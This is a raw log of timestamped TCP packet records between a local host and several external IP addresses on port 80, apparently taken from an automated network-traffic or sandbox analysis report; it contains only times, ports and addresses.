Jan 10, 2025 19:56:27.990529060 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.990540981 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.990556002 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.990581036 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.990991116 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.991022110 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.991035938 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.991050005 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.991060972 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.991096020 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.994730949 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.999531031 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:33.149167061 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:33.154010057 CET	80	49791	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:33.154119015 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:33.170461893 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:33.175337076 CET	80	49791	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:33.609134912 CET	80	49791	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:33.609183073 CET	80	49791	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:33.609217882 CET	80	49791	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:33.609277964 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:33.609277964 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:34.678504944 CET	49791	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:35.697429895 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:35.702282906 CET	80	49805	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:35.702429056 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:35.718694925 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:35.723570108 CET	80	49805	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:36.194423914 CET	80	49805	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:36.194439888 CET	80	49805	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:36.194567919 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:36.194611073 CET	80	49805	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:36.194689035 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:37.225428104 CET	49805	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:38.245016098 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:38.249784946 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.249908924 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:38.265829086 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:38.270627975 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.270773888 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.721745014 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.721767902 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.721803904 CET	80	49824	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:38.721908092 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:38.721954107 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:39.772231102 CET	49824	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:40.791557074 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:40.796401978 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:40.796530962 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:40.811235905 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:40.816059113 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:41.276339054 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:41.276359081 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:41.276434898 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:41.276505947 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:41.276585102 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:41.282485962 CET	49839	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:41.287286043 CET	80	49839	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:46.541336060 CET	49874	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:46.546133041 CET	80	49874	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:46.546255112 CET	49874	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:46.562665939 CET	49874	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:46.567539930 CET	80	49874	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:47.422580957 CET	80	49874	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:47.422681093 CET	80	49874	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:47.422765017 CET	49874	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:48.069130898 CET	49874	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:49.088671923 CET	49889	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:49.093642950 CET	80	49889	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:49.093766928 CET	49889	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:49.110348940 CET	49889	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:49.115106106 CET	80	49889	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:49.756146908 CET	80	49889	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:49.756218910 CET	80	49889	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:49.756272078 CET	49889	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:50.616436958 CET	49889	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:51.635608912 CET	49905	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:51.640367031 CET	80	49905	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:51.640461922 CET	49905	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:51.657730103 CET	49905	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:51.662542105 CET	80	49905	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:51.662648916 CET	80	49905	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:52.294718981 CET	80	49905	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:52.294867992 CET	80	49905	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:52.298152924 CET	49905	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:53.163403988 CET	49905	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.184463978 CET	49923	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.189414978 CET	80	49923	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:54.189496994 CET	49923	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.199975014 CET	49923	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.204756975 CET	80	49923	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:54.818375111 CET	80	49923	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:54.818447113 CET	80	49923	146.88.233.115	192.168.2.8
Jan 10, 2025 19:56:54.818588972 CET	49923	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.821608067 CET	49923	80	192.168.2.8	146.88.233.115
Jan 10, 2025 19:56:54.826373100 CET	80	49923	146.88.233.115	192.168.2.8
Jan 10, 2025 19:57:00.187203884 CET	49960	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:00.192131042 CET	80	49960	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:00.192241907 CET	49960	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:00.208782911 CET	49960	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:00.214281082 CET	80	49960	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:01.725337982 CET	49960	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:01.731399059 CET	80	49960	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:01.731448889 CET	49960	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:02.763932943 CET	49976	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:02.768819094 CET	80	49976	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:02.768923998 CET	49976	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:02.786247969 CET	49976	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:02.791040897 CET	80	49976	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:04.287915945 CET	49976	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:04.292948961 CET	80	49976	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:04.293039083 CET	49976	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:05.307101965 CET	49992	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:05.311918020 CET	80	49992	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:05.312316895 CET	49992	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:05.329797983 CET	49992	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:05.334624052 CET	80	49992	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:05.334767103 CET	80	49992	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:06.834861040 CET	49992	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:06.839768887 CET	80	49992	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:06.839850903 CET	49992	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:07.854073048 CET	49995	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:07.858975887 CET	80	49995	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:07.859112024 CET	49995	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:07.869687080 CET	49995	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:07.874654055 CET	80	49995	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:08.580559015 CET	80	49995	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:08.580635071 CET	80	49995	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:08.580825090 CET	49995	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:08.583559036 CET	49995	80	192.168.2.8	85.159.66.93
Jan 10, 2025 19:57:08.588340998 CET	80	49995	85.159.66.93	192.168.2.8
Jan 10, 2025 19:57:14.062825918 CET	49996	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:14.067610979 CET	80	49996	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:14.067749977 CET	49996	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:14.083796024 CET	49996	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:14.088624954 CET	80	49996	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:15.095706940 CET	80	49996	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:15.095979929 CET	80	49996	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:15.096105099 CET	49996	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:15.600606918 CET	49996	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:16.620078087 CET	49997	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:16.624914885 CET	80	49997	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:16.626205921 CET	49997	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:16.641395092 CET	49997	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:16.646354914 CET	80	49997	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:17.678128004 CET	80	49997	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:17.679205894 CET	80	49997	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:17.679275036 CET	49997	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:18.147376060 CET	49997	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:19.166384935 CET	49998	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:19.171437979 CET	80	49998	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:19.171541929 CET	49998	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:19.188211918 CET	49998	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:19.193140030 CET	80	49998	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:19.193236113 CET	80	49998	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:20.214004993 CET	80	49998	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:20.214786053 CET	80	49998	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:20.214853048 CET	49998	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:20.694225073 CET	49998	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:21.713382006 CET	49999	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:21.718290091 CET	80	49999	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:21.718415976 CET	49999	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:21.728580952 CET	49999	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:21.733390093 CET	80	49999	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:22.795964003 CET	80	49999	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:22.796957016 CET	80	49999	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:22.797034979 CET	49999	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:22.798970938 CET	49999	80	192.168.2.8	104.21.7.187
Jan 10, 2025 19:57:22.803719044 CET	80	49999	104.21.7.187	192.168.2.8
Jan 10, 2025 19:57:27.824801922 CET	50000	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:27.829685926 CET	80	50000	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:27.830230951 CET	50000	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:27.845922947 CET	50000	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:27.850824118 CET	80	50000	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:28.298774004 CET	80	50000	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:28.298806906 CET	80	50000	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:28.298909903 CET	50000	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:29.364481926 CET	50000	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:30.369807005 CET	50001	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:30.374751091 CET	80	50001	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:30.374871016 CET	50001	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:30.390326023 CET	50001	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:30.395232916 CET	80	50001	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:30.841773033 CET	80	50001	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:30.842003107 CET	80	50001	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:30.842190981 CET	50001	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:31.897411108 CET	50001	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:32.916584969 CET	50002	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:33.029083014 CET	80	50002	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:33.029242039 CET	50002	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:33.045672894 CET	50002	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:33.050744057 CET	80	50002	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:33.050759077 CET	80	50002	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:33.521481037 CET	80	50002	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:33.545471907 CET	80	50002	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:33.545530081 CET	50002	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:34.553586960 CET	50002	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:35.573080063 CET	50003	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:35.578124046 CET	80	50003	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:35.578268051 CET	50003	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:35.591742992 CET	50003	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:35.596775055 CET	80	50003	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:45.033318996 CET	80	50003	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:45.033545017 CET	80	50003	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:45.033632040 CET	50003	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:45.036288023 CET	50003	80	192.168.2.8	13.248.169.48
Jan 10, 2025 19:57:45.041059017 CET	80	50003	13.248.169.48	192.168.2.8
Jan 10, 2025 19:57:50.257498026 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.262331009 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.262428999 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.277206898 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.282376051 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908188105 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908283949 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908296108 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908303022 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908313036 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908318996 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908324957 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908332109 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908337116 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908349991 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.908441067 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.908442020 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.913333893 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.913348913 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.913441896 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:50.995049953 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.995071888 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.995086908 CET	80	50004	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:50.995296001 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:51.788091898 CET	50004	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:52.806879044 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:52.811975956 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:52.812100887 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:52.827522039 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:52.832413912 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560177088 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560194969 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560208082 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560246944 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.560292006 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560303926 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560314894 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560328007 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560329914 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.560340881 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560354948 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.560355902 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560370922 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.560393095 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.560410023 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.565217018 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.565251112 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.565263033 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.565274954 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.565290928 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.565320015 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.651077032 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.651097059 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.651127100 CET	80	50005	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:53.651171923 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:53.651215076 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:54.334899902 CET	50005	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.365771055 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.370754957 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.370944023 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.387485027 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.392359018 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.392467976 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982645988 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982673883 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982688904 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982741117 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.982943058 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982954979 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982960939 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982971907 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.982991934 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.982995987 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.983007908 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.983019114 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.983038902 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.983079910 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:55.987565041 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.987590075 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.987601995 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:55.987775087 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:56.069387913 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:56.069408894 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:56.069425106 CET	80	50006	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:56.069494009 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:56.897418022 CET	50006	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:57.981893063 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:57.986864090 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:57.986979961 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.008213997 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.013082027 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813318968 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813375950 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813402891 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813441038 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813466072 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813489914 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813513994 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813538074 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813563108 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813589096 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.813636065 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.813699961 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.818531990 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.818577051 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.818603992 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.818629980 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.818633080 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.818684101 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.914158106 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.914181948 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.914199114 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:57:58.914588928 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.917464972 CET	50007	80	192.168.2.8	162.0.213.94
Jan 10, 2025 19:57:58.922358990 CET	80	50007	162.0.213.94	192.168.2.8
Jan 10, 2025 19:58:03.948539972 CET	50008	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:03.953418016 CET	80	50008	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:03.953507900 CET	50008	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:03.970964909 CET	50008	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:03.975797892 CET	80	50008	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:04.416810989 CET	80	50008	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:04.416837931 CET	80	50008	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:04.416939020 CET	50008	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:05.478214979 CET	50008	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:06.495079041 CET	50009	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:06.499984980 CET	80	50009	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:06.500102997 CET	50009	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:06.516493082 CET	50009	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:06.521409035 CET	80	50009	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:06.985340118 CET	80	50009	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:06.985447884 CET	80	50009	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:06.985490084 CET	50009	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:08.023266077 CET	50009	80	192.168.2.8	3.33.130.190
